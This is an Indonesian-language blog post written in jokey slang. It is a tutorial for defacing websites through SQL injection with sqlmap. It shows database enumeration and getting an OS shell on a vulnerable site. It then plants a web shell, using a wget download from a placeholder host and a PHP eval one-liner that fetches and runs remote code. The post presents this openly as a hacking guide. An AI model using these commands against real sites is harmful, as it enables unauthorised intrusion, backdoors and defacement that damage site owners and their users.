Breaking

Selasa, 24 September 2019

Sql-i into out file with sqlmap

eh wasapp gaes balik lagi ma gw admin wibu, ganteng di sini h3h3h3h , kali ini gw mau kasih tutor deface ya karna ra deface ra uwu:3 , PoC : SQL-I INTO OUT FILE WITH SQLMAP ,  sebenernya ada yang cara manual tapi lagi maled w, poc ini ga jauh beda sama sqli biasa buat yang belom bisa sqli liat tutor berikut Touch me onii-chan

Bahan buat nghek :
- tools sqlmap
- site vuln
- ganteng h3h3h3h3

Cara install sqlmap :3
pkg install git && pkg install python2
git clone https://github.com/sqlmapproject/sqlmap

Oke langsung gad ke tutor nya ..

Pertama open tools sqlmap nya : 
Cd sqlmap
Jika sudah jalankan tools sqlmal nya dengan cara
Python2 sqlmap -u localhost:8080/bapakkau.php?id=69 --dbs 
screenshotnya onichann :

*sorry buriq lurd xixixi 

Oke jika sudah dapat db nya tinggal gad muehehe dengan cara : 

Python2 sqlmap.py - u localhost:8080/bapakkau.php?id=69 --os-shell 
*sorry buriq lurd xixixix

Nah nanti ada pilihan dari tools nya lu pilih aja sendiri , w mld soalnya xixixi . 

Kalo udah berhasil gitu tampilan nya onii-chan:( 

Sekarang tinggal lo panggil shell pake command remote code execution( rce rce tai anjing ๐Ÿ˜ƒ )

cara manggil nya seperti ini oniichan:3 
- wget linkshell.com/Shell.txt -O Shell.php
- echo '<?php eval("?>".file_get_contents("linkshell.com/Shell.txt"));?>' > shell.php


Ya sekian dari gw h3h3h3h3 , kurang lebih nya mon maap . Stay strong ailopyu all๐Ÿ˜ƒ❤



3 komentar: